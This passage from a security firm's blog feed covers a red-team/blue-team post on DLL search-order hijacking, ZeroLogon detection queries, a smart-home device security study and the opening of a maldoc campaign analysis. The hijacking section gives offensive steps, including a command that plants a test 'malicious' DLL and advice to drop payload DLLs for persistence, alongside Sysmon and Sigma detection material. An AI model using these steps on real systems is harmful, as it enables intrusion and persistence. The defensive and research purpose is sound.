  • Non-HTTP protocols (we’re only using an HTTP proxy, so non-HTTP protocols won’t be intercepted)
  • Very heavy obfuscation
  • Anti-tampering controls

You will usually see these features in either mobile games or financial applications. At this point, you’ll have to reverse engineer the application and write your own Frida scripts. This can be an incredibly difficult and time consuming process, and a step-by-step guide such as this will never be able to help you there. But that, of course, is where the fun begins 😎.

About the author


Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff. You can find Jeroen on LinkedIn.

NVISO and QuoIntelligence Announce Strategic Cooperation

30 October 2020 at 10:51

We are pleased to announce that we have created a unique approach with QuoIntelligence GmbH to TIBER-EU testing. Using our approach, we combine both passive threat intelligence gathering and active offensive red team testing into one seamless experience while remaining independent from each other.

The TIBER-EU Framework, More Critical Now Than Ever 

The constant evolution of the cyber threat landscape combined with the recent acceleration of the financial sector’s digital transformation, led by new global challenges such as the COVID-19 pandemic, brings new complex cyber threats using more advanced methods and techniques. Financial institutions can better face these evolving threats and aim to reach a more secure digital environment by putting in place the right cyber and operational resilience strategies early on. 

In order to test and improve the cyber resilience of financial institutions, the European Central Bank developed a framework for ‘Threat Intelligence Based Ethical Red Teaming’, commonly known as TIBER-EU framework, to carry out a controlled cyberattack based on real-life threat scenarios. TIBER-EU exercises are designed for entities which are part of the core financial infrastructure at the national or European level.

“It is the first EU-wide guide on how authorities, entities, threat intelligence and red-team providers should work together to test and improve the cyber resilience of entities by carrying out a controlled cyberattack.”  – Fiona van Echelpoel, Deputy Director General at ECB 

By conducting a TIBER-EU test, institutions can enhance their cyber and operational resilience by focusing on technology, monitoring and human awareness strengths & weaknesses before they are exploited by real-life threat actors. The exercise’s main objective is to test and improve protection, detection, and response capabilities against sophisticated cyber threats. By implementing a TIBER-EU test, European organizations will be able to reduce the impact of potential cyberattacks.

Source: Lessons Learned and Evolving Practices of the TIBER Framework

Benefits for European Organizations 

Since the TIBER-EU testing process can be quite overwhelming for the testing entities, selecting the right qualified providers is the first step towards a successful experience and resourceful outcome. The combined work and fluent integration and communication between the Threat Intelligence and Red Teaming providers is crucial to implementing optimal strategies tailored to the testing entity’s cyber strengths and weaknesses.

For this reason, we at NVISO are cooperating with QuoIntelligence GmbH, a German Threat Intelligence provider supporting decision-makers with customized and actionable intelligence reports, to facilitate the cyber resilience testing process. Within this approach, QuoIntelligence first looks at the range of possible threats, selects the most applicable threat actors likely to target the entity, and creates a customized Targeted Threat Intelligence Report which lays the foundation for the Red Teaming’s attack scenarios. Then, NVISO, as the Red Teaming provider, carries out the simulated attack and attempts to compromise the critical functions of the entity by mimicking one of the real-life threat actors in scope.

In cooperation with QuoIntelligence, we already implemented effective joint processes and offer a seamless experience between the Threat Intelligence and Red Teaming providers. Organizations can then take the worry out of the process and be led by experienced providers. 


Cybersecurity risks are becoming harder to assess and interpret due to the growing complexity of the threat landscape, adversarial ecosystem, and expansion of the attack surface.

“The expansion of knowledge and expertise in cybersecurity is crucial to improve preparedness and resilience. The EU should continue building capacity through the investment in cybersecurity training programs, professional certification, exercises and awareness campaigns.”  – ENISA Threat Landscape Report 2020 

In order to test and improve the cyber resilience of the European financial sector, the European Central Bank has put in place the TIBER-EU framework involving a close collaboration between a Threat Intelligence provider and a Red Teaming provider.

QuoIntelligence and NVISO are now offering a strategic approach to simplify the TIBER-EU testing process and offer a worry-free experience to European organizations that want to take their cyber and operational resilience to the next level.

Authors and contact

In case of questions and for more information, please contact [email protected].

This article was written by Marina Hirschberger, Senior Security Consultant, in collaboration with Jonas Bauters, Solution Lead for Red Teaming at NVISO, and in cooperation with Iris Fernandez, Marketing Expert at QuoIntelligence GmbH.

MITRE ATT&CK turned purple – Part 1: Hijack execution flow

6 October 2020 at 10:42

The MITRE ATT&CK framework is probably the most well-known framework in terms of adversary emulation and, by extension, red teaming.
It features numerous TTPs (Tactics, Techniques, and Procedures) and maps them to threat actors. Being familiar with this framework benefits not only red team operations but blue team operations as well! To create the most secure environment for your enterprise, it is imperative that you know what threat actors are using and how to defend against it.

Achieving 100% coverage of MITRE ATT&CK is probably not feasible; by choosing which TTPs are most relevant for your environment, however, you can start setting up baseline defenses and expand from there. This will help you mature your enterprise’s security posture significantly. We at NVISO use the framework in our daily operations and have therefore decided it was time to combine the in-house knowledge of both our blue and red teams to provide insight into how these techniques can be leveraged from an offensive point of view AND how to prevent (or at least detect) the technique from a defensive point of view. In our first blogpost of the series, we cover T1574 – Hijack Execution Flow.

Offensive point of view: Leveraging execution flow hijacking in red team engagements and threat emulations

Execution flow hijacking usually boils down to the following: identifying a binary present on the system that is missing dependencies (typically a DLL) and providing said missing dependency. Luckily for us, the good people at Microsoft have gifted us with a tool suite called sysinternals, which we will happily leverage to identify missing dependencies.

It should be noted that casually dropping Sysinternals tools on a target environment is very poor operational security and probably won’t do you much good anyway. For most of the tooling (if not all), you will need administrative privileges on the machine you are running it from. It is therefore much more interesting to have some “educated” knowledge beforehand of what tools live on your target environment. Alternatively (and simpler), you can hijack a program you know will most likely be installed. Some fine examples of this would be Teams, Chrome, Firefox, …

We can identify missing dependencies using a tool created by our friends over at SpecterOps called “DLLHijackTest”. This tool needs an export from Sysinternals’ Process Monitor and will attempt to verify if the identified processes are indeed hijackable, as not all missing DLLs are loaded in a way that calls DLLMain at execution time.

Let’s identify some nice missing dependencies on our trusted Internet Explorer using the following Process Monitor filter:

After this filter is applied, let’s open Internet Explorer and check our process monitor light up like a Christmas tree:

Now we can export this as a CSV file by going to file -> save and choosing CSV as an output format.

All we need now is a valid hijack, which we can test using the aforementioned PowerShell script from SpecterOps:

Get-PotentialDLLHijack -CSVPath "G:\testzone\DLLHijackTest-master\InternetExplorer\IE.CSV" -MaliciousDLLPath "G:\testzone\DLLHijackTest-master\x64\Release\DLLHijackTest.dll" -ProcessPath "C:\Program Files\Internet Explorer\iexplore.exe"

What happens now is the following chain of steps:

  • A DLL gets dropped in the location of the application and is named after a missing dependency
  • The process gets launched
  • If the DLLMain method is called, the DLL will write its own path to a location that you hardcode in the source code of the SpecterOps project.
  • The process terminates

This repeats until the entire CSV is parsed. If the application has a vulnerable hijack, an output file will be created at the location you hardcoded.

In the case of Internet Explorer this is indeed the case:

We have successfully fuzzed Internet Explorer and identified four missing DLLs that are in fact loaded and their DLLMain is executed.

Note: for this blogpost, IE was chosen as a PoC. You need admin rights to write to C:\Program Files\, so for red team ops this is a pretty weak candidate, unless you abuse it for persistence.

Now all that is left to do is create a DLL that executes your payload, name it one of the missing dependencies identified in the results file and drop it on disk.
Every time Internet Explorer is opened, your DLL payload will fire.

Defensive point of view: Preventing and detecting execution flow Hijacks

When looking through the public Sigma repository, it is noticeable how only a few rules to detect this technique exist:
Only some 20 rules exist, two of which are authored by NVISO: Maxime Thiebaut’s “Windows Registry Persistence COM Search Order Hijacking”, and “Fax Service DLL Search Order Hijack” by Bart Parys and yours truly. All of these only cover specific instances of this technique. The reason is simply that it is next to impossible to write a rule that covers the many options the red team/adversary has to exploit this technique. Proper detection is achievable, however, by getting a baseline of your environment and alerting on any DLLs/EXEs loaded from unexpected locations.

While Sysmon can be configured to log ImageLoaded events as event ID 7, this is disabled by default because of the massive amount of logs it would generate.
To help with triaging you can use a PowerShell script to semi-automatically generate a Sysmon config that excludes all known-good DLLs that are loaded.
See the example below for one such (basic) PowerShell script:

# Run this script repeatedly to automatically add the newly used DLLs to the exclusions.
# Do a reboot after installing the "base" Sysmon config to log all the DLLs loaded in the Windows boot process.

# Modify to point to the Sysmon executable.
$SYSMON_EXECUTABLE = "C:\Sysmon\Sysmon64.exe"
# Modify to point to the new config. (Will be overwritten by a run of the script!)
$CONFIG_FILE = "C:\Sysmon\config.xml"

Function Get-DLLs {
    # Using a HashSet to avoid having to filter for duplicates
    $dlls = New-Object System.Collections.Generic.HashSet[String]
    try {
        # Retrieve all Sysmon ImageLoaded events
        $events = Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "Event[System[(EventID=7)]]"
        # Extract the ImageLoaded from the events' Message fields
        $events.Message | ForEach-Object -Process {
            $loaded = (Select-String -InputObject $_ -Pattern "ImageLoaded: (.*)").Matches.Groups[1]
            $dlls.Add($loaded) | Out-Null
        }
    } catch {}
    # Sort before returning for consistent & manageable output
    $dlls | Sort-Object
}

Function Export-SysmonConfig {
    param($dlls)
    $XMLHeader = @"
<Sysmon schemaversion="4.22">
    <EventFiltering>
        <RuleGroup name="" groupRelation="or">
            <ImageLoad onmatch="exclude">
"@
    $XMLTrailer = @"
            </ImageLoad>
        </RuleGroup>
    </EventFiltering>
</Sysmon>
"@
    # To indent <ImageLoaded> for readability.
    $Offset = "                "
    Function Format-Exclusion {
        param($dll)
        $dll = $dll.Trim()
        $Offset + "<ImageLoaded condition=`"is`">$dll</ImageLoaded>`n"
    }
    $XMLConfig = $XMLHeader + "`n"
    $XMLConfig += $Offset + "<ImageLoaded condition=`"is`">$SYSMON_EXECUTABLE</ImageLoaded>`n"
    $XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\System32\</ImageLoaded>`n"
    $XMLConfig += $Offset + "<ImageLoaded condition=`"begin with`">C:\Windows\SysWOW64\</ImageLoaded>`n"
    foreach ($dll in $dlls) {
        $XMLConfig += Format-Exclusion $dll
    }
    $XMLConfig += $XMLTrailer
    $XMLConfig
}

$dlls = Get-DLLs
Export-SysmonConfig $dlls | Tee-Object -FilePath $CONFIG_FILE
# Install the new config to lower the amount of logs generated.
Start-Process -FilePath $SYSMON_EXECUTABLE -ArgumentList @('-c', $CONFIG_FILE)

Be sure to only execute this on a known-good device, such as a freshly imaged laptop or a new VM:
If you use a potentially compromised device to generate this, there is a chance of excluding a malicious DLL that can then remain completely undetected in your environment.
You will need to run this every time a piece of software gets updated, as the loaded DLLs may change (new DLLs added, older DLLs no longer relevant) depending on the version of the software.

Note that to limit the amount of exclusions the config needs, the C:\Windows\System32\ and C:\Windows\SysWOW64\ directories are excluded in their entirety by the script.
You should set up a SIEM alert for Sysmon event ID 11 (FileCreate) if the TargetFilename starts with either of these directories.
A Sigma rule to detect this looks as follows:

title: DLL Created In Windows System Folder
id: ddc5624d-4127-4787-8cd9-e0943ebb10e8
status: experimental
description: |
  Detects new DLLs written to the Windows system folders.
  Can be used to gain persistence on a system by exploiting DLL hijacking vulnerabilities.
references:
  - https://blog.nviso.eu/2020/10/06/mitre-attack-turned-purple-part-1-hijack-execution-flow
tags:
  - attack.t1574.001
  - attack.t1574.002
author: NVISO
date: 2020/10/05
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 11
    TargetFilename|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
    TargetFilename|endswith: '.dll'
  condition: selection
falsepositives:
  - Driver installations
  - Some other software installations
level: high

If your configuration is correct, you should not generate any Sysmon event ID 7 for legitimate DLLs and you can simply alert on any occurrence of the event as potentially malicious.
Any DLLs dropped in the excluded directories get flagged by the Sigma rule for proper coverage.
Even if your Sysmon config does not cover 100% of the legitimately loaded DLLs, the volume of generated events should be low enough to remain workable, and additional filtering can be done in a SIEM or automated in a SOAR solution, for example.
With sufficient time, your detection capabilities for this technique should be tuned finely enough as to not generate many false positives.

Detection for this technique is obviously not cut-and-dry but it is possible to have very good coverage, provided your blue team gets a proper testing environment to improve their detection capabilities.

Prevention of this technique works very similarly to detection:
One can write AppLocker policies to only allow known DLLs to load.
You can build the list of allowed DLLs by setting the policy to audit mode for several weeks and appending any DLLs that were missed by the initial testing to the list of known-good ones before enforcing your policies.

The script and rule in this blogpost are available on our GitHub.


We hope that this blogpost has provided you with actionable information and has given you more insight into leveraging this technique and defending against it.
This was the first blogpost of a recurring series, we hope to see you again when we cover another ATT&CK technique in the near future!
From all of us at NVISO, stay safe!

About the author(s)

  • Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. When he is not working, you can probably find Jean-François in the Gym or conducting research. Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
    He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
    You can find Jean-François on LinkedIn and on Hack The Box.
  • Remco Hofman is an intrusion analyst in NVISO’s MDR team, always looking at improving the detection capabilities of the service. A few cups of properly brewed tea help him unwind after a long day’s work.
    You can find him on Twitter or LinkedIn.

Sentinel Query: Detect ZeroLogon (CVE-2020-1472)

17 September 2020 at 09:56

In August 2020 Microsoft patched the ZeroLogon vulnerability CVE-2020-1472. In summary, this vulnerability would allow an attacker with a foothold in your network to become a domain admin in a few clicks. The attacker only needs to establish a network connection towards the domain controller.

At NVISO we support multiple clients with our MDR services. From that perspective, our security experts analyzed the vulnerability and wrote queries for both Sentinel and threat hunting (“Advanced Hunting”) to detect these types of activities in your network.

One requirement for running Sentinel queries is of course that you have on-boarded Active Directory event logs in your Sentinel log analytics workspace. This can be done by installing the Microsoft Monitoring Agent and forwarding the events towards said workspace.

In case these logs are available you can use the query below to detect activities related to the ZeroLogon vulnerability. Within this query, you have to replace DC1$ and DC2$ with the hostname(s) of your Domain Controllers.

//Search for anonymous logons, note this may produce FPs
SecurityEvent
| extend EvData = parse_xml(EventData)
| extend EventDetail = EvData.EventData.Data
| extend TargetUserName_CS = EventDetail.[1].["#text"], SubjectUserSid_CS = EventDetail.[4].["#text"], SubjectUserName_CS = EventDetail.[5].["#text"]
| project-away EvData, EventDetail
| where ((EventID == 4742)
    and (TargetUserName_CS in~ ("DC1$", "DC2$"))
     and ((SubjectUserName_CS contains "anonymous") or (SubjectUserSid_CS startswith "S-1-0") or (SubjectUserSid_CS startswith "S-1-5-7")))

The following image shows an example output of this query:

Should Sentinel not be available or the workspace has not been set up, we also include a KQL query (KUSTO rule) to be used in Advanced Hunting:

//Search for anonymous logons, note this may produce FPs
union DeviceLogonEvents, DeviceProcessEvents
| where AccountName in~ ("anonymous") or InitiatingProcessAccountName in~ ("anonymous") or
AccountSid startswith "S-1-0" or InitiatingProcessAccountSid startswith "S-1-0" or
AccountSid startswith "S-1-5-7" or InitiatingProcessAccountSid startswith "S-1-5-7"
//Remove FP
| where InitiatingProcessFileName != "ntoskrnl.exe"
| summarize by Timestamp, DeviceId, ReportId, DeviceName, AccountName, InitiatingProcessAccountName, AccountSid,
InitiatingProcessAccountSid, AccountDomain, InitiatingProcessFileName, ProcessCommandLine, AdditionalFields

Note that Anonymous Logons should be investigated either way. While the source may be benign – for example the host itself, an Administrator, or a Service account – it can also indicate malicious behavior. Use the Sentinel query below to investigate further.

//Once a detection from previous rule has hit, use the following to validate - if there IS a logon, investigate further. If not, it's likely a False Positive
SecurityEvent
| where ((EventID == 4624) and (TargetUserName =~ "DC1$"))
| distinct SubjectUserName

One way of investigating further whether this is a False Positive or not is to leverage the Netlogon log and correlate or compare its output with the results of running the queries above. This log is disabled by default, but can be enabled as follows on the affected Domain Controller (DC):

  1. Execute the following commands in an elevated prompt:
    • Nltest /DBFlag:2080FFFF
    • net stop netlogon
    • net start netlogon
  2. The same can be achieved with (elevated) PowerShell:
    • Nltest /DBFlag:2080FFFF
    • Restart-Service Netlogon
  3. Investigate the log file that will be created. Note it may take a while to reproduce the event. The log file is found at: %windir%\debug\netlogon.log
  4. Correlate the event(s) from before in the Netlogon log. Once identified, you can disable Netlogon logging again by setting the DBFlag as 0x0.
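To help with step 4, a small script can pre-filter the Netlogon log for authentication entries before correlating them with the query results. The Python sketch below is a hypothetical illustration (not from the original post); the `MM/DD HH:MM:SS` line prefix is an assumption based on the typical Netlogon debug log format, so adjust the pattern to match your actual log:

```python
import re

# Hypothetical helper: pull timestamped NetrServerAuthenticate* lines out of
# %windir%\debug\netlogon.log so they can be correlated with SIEM results.
# The "MM/DD HH:MM:SS" prefix is an assumption about the log format.
LINE = re.compile(r"^(\d{2}/\d{2} \d{2}:\d{2}:\d{2}) .*?(NetrServerAuthenticate\w*)")

def auth_attempts(log_text: str) -> list:
    """Return (timestamp, function) pairs for authentication entries."""
    return [m.groups() for line in log_text.splitlines()
            if (m := LINE.match(line))]
```

A burst of `NetrServerAuthenticate` calls from a single client in a short window is the kind of pattern worth lining up against the timestamps returned by the Sentinel queries above.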

The following query will assist in detecting whenever a vulnerable Netlogon secure channel connection is allowed – keep in mind however this will only work should you have already applied the patch:

//This query will work ONLY after the patch has been applied. It warrants further investigation.
| where EventID == 5829

On top of this we also wrote an additional KQL query to search for evidence – specifically, if someone has (intentionally or not) disabled Enforcement Mode.

//Netlogon enforcement explicitly disabled
union DeviceProcessEvents, DeviceRegistryEvents
| where RegistryKey contains "\\system\\currentcontrolset\\services\\netlogon\\parameters"
| where RegistryValueName == "FullSecureChannelProtection"
| where RegistryValueType == "Dword"
| where RegistryValueData == 0 or RegistryValueData == 0x00000000
| summarize by Timestamp, DeviceId, ReportId, DeviceName, RegistryKey, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine

Note that the KUSTO hunting queries can also be leveraged as a Detection Rule, which allows for proactive alerting.

In case you want additional details about the queries or Sentinel, please do not hesitate to reach out! You can contact the blog authors or fill in the contact form on our website https://www.nviso.eu.


Our research is based upon the following references


This blog post was created based on the collaborative effort of :

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the base security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: there’s a long road ahead of this industry to grow in maturity when it comes to security.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market share of smart home devices has been steadily rising for quite some time now, and that is not expected to be changing anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms or might even be spying on people through their internet-connected camera. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce to our daily lives really? I’ve tried to find out exactly that.

File:HAL9000 I'm Sorry Dave Motivational Poster.jpg - Wikimedia Commons
The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this proved to be not always easy: Wireshark will tell you if TLS is being used or not, but aside from that, how can we determine if a raw TCP or UDP data stream is encrypted or not? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)

The above results indicate that while some devices did use state-of-the-art, standardised, and most importantly secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TCP/UDP streams) or has been proven insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: every single device sent some data that was likely not encrypted – even those devices that encrypted the majority of their communications still sent DNS or sometimes NTP requests unencrypted over the network.
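For those who want to try this at home, the entropy measure these tests rely on can be sketched in a few lines of Python. This is a minimal illustration of the idea, not the actual simple_tcp_stats / simple_udp_stats code:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: near 0 for constant data, near 8 for
    random-looking (likely encrypted or compressed) data."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total)
                for c in Counter(data).values())
```

Running this over each reassembled TCP/UDP stream and plotting the scores per device gives exactly the kind of box plots shown above: streams of natural text or structured data sit low on the scale, while encrypted streams cluster near 8 bits per byte.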

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network. This has been a violation of secure web development practices for a long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces also need the same care and protection as any other exposed service would have. It’s not because a device isn’t directly open for connections over the internet, that an attacker who gained access to the local network won’t try to gain a larger foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.

What this concretely means is that there is no straightforward, easy way to get insight into the security of these devices. Gaining such knowledge would require tailored, targeted security assessments: a time-consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding android apps with MobSF (Mobile Security Framework). More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.

I found that a lot of applications were asking for a disproportionally large number of permissions, sometimes even permissions an application arguably would not need to function properly. For example, what use does a smart light bulb app have for requesting permissions to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? For starters, every section above contained some good news, usually followed by a ‘but’. Looking at the bigger picture, security seems to be quite hit or miss: devices that were properly secured on one front usually also did well on all the others, while devices that lacked certain security controls were usually insecure across the board. Most notably, my results clearly confirmed what security professionals already knew: security is a complete package. You simply can’t cover one part and leave the other aspects of your product exposed. Products from manufacturers that understood this used network protocols known to be secure, offered strong authentication options, and provided the user friendliness that made sure security was taken care of by default, with little effort required from the consumer. The other products often treated security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or maybe not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here – it should never be your only indicator. I found that brand recognition is an important factor in the level of attention a manufacturer will pay to the security of their device. If a brand is well known and needs to uphold a good reputation to stay in business, it will also spend more time fixing security flaws in the future, even after the product has been out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.


[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Epic Manchego – atypical maldoc delivery brings flurry of infostealers

1 September 2020 at 11:33

In July 2020, NVISO detected a set of malicious Excel documents, also known as “maldocs”, that deliver malware through VBA-activated spreadsheets. While the malicious VBA code and the dropped payloads were something we had seen before, it was the specific way in which the Excel documents themselves were created that caught our attention.

The creators of the malicious Excel documents used a technique that allows them to create macro-laden Excel workbooks, without actually using Microsoft Office. As a side effect of this particular way of working, the detection rate for these documents is typically lower than for standard maldocs.

This blog post provides an overview of how these malicious documents came to be. In addition, it briefly describes the observed payloads and finally closes with recommendations as well as indicators of compromise to help defend your organization from such attacks.

Key Findings (TL;DR)

  • The malicious Microsoft Office documents are created with the EPPlus software rather than Microsoft Office Excel; because these documents differ from typical Excel documents, they may fly under the radar;
  • NVISO assesses with medium confidence that this campaign is run by a single threat actor, based on the limited number of documents uploaded to services such as VirusTotal and the similarities in payload delivery throughout the campaign;
  • The payloads observed up to the date of this post have, for the most part, been so-called information stealers intent on harvesting passwords from browsers, email clients, etc.;
  • The payloads stemming from these documents have evolved only slightly in terms of obfuscation and masquerading. This is another indication of a single actor who is slowly evolving their technical prowess.


The analysis section below is divided into two parts, each referring to a specific link in the infection chain.

Malicious document analysis

In an earlier blog post, we wrote about “VBA Purging”[1], which is a technique to remove compiled VBA code from VBA projects. We were interested to see if any malicious documents found in-the-wild were adopting this technique (it lowers the initial detection rate of antivirus products). This is how we stumbled upon a set of peculiar malicious documents.

At first, we thought they were created with Excel and then VBA purged. But closer examination led us to believe that these documents were created with a .NET library that creates Office Open XML (OOXML) spreadsheets. As stated in our VBA Purging blog post, Office documents can also lack compiled VBA code when they are created with tools that are totally independent from Microsoft Office. EPPlus is such a tool. We are familiar with this .NET library, as we have been using it for a couple of years to create malicious documents (“maldocs”) for our red team and penetration testers.

When we noticed that the maldocs had no compiled code, and were also missing Office metadata, we quickly thought about EPPlus. This library also creates OOXML files without compiled VBA code and without Office metadata.

The OOXML file format is an Open Packaging Conventions (OPC) format: a ZIP container with mainly XML files, and possibly binary files (like pictures). It was first introduced by Microsoft with the release of Office 2007. OOXML spreadsheets use extension .xlsx and .xlsm (for spreadsheets with macros).
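As a quick illustration of the OPC format (a sketch of ours using Python's standard zipfile module, not part of any analyzed tooling): an OOXML document can be opened like any ZIP archive, and macro-enabled workbooks carry their VBA project as the xl/vbaProject.bin part.

```python
import zipfile

def ooxml_parts(path: str) -> list:
    """List the parts (XML files, binaries) inside the OPC/ZIP container."""
    with zipfile.ZipFile(path) as z:
        return z.namelist()

def has_vba_project(path: str) -> bool:
    """Macro-enabled (.xlsm) workbooks store the VBA project at this part."""
    return "xl/vbaProject.bin" in ooxml_parts(path)
```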

When a VBA project is created with EPPlus, it does not contain compiled VBA code. EPPlus has no methods to create compiled code: the algorithms to create compiled VBA code are proprietary to Microsoft.

The very first malicious document we detected was created on the 22nd of June 2020, and since then 200+ malicious documents have been found over a period of 2 months. The actor has increased their activity in recent weeks: we now see more than 10 new malicious documents on some days.

Figure 1 – Unique maldocs observed per day

The maldocs discovered over the course of two months have many properties that differ markedly from those of documents created with Microsoft Office, which we believe is because they were created with a tool independent from Microsoft Excel. Although we don’t have a copy of the exact tool used by the threat actor, the documents it produces share many properties that convince us they were created with the aforementioned EPPlus software.

Some of EPPlus’ properties include, but are not limited to:

  • Powerful and versatile library: not only can it create spreadsheets containing a VBA project, but that project can also be password protected and/or digitally signed. It does not rely on Microsoft Office. It can also run on Mono (cross platform, open-source .NET).
  • OOXML files created with EPPlus have some properties that distinguish them from OOXML files created with Excel. Here is an overview:
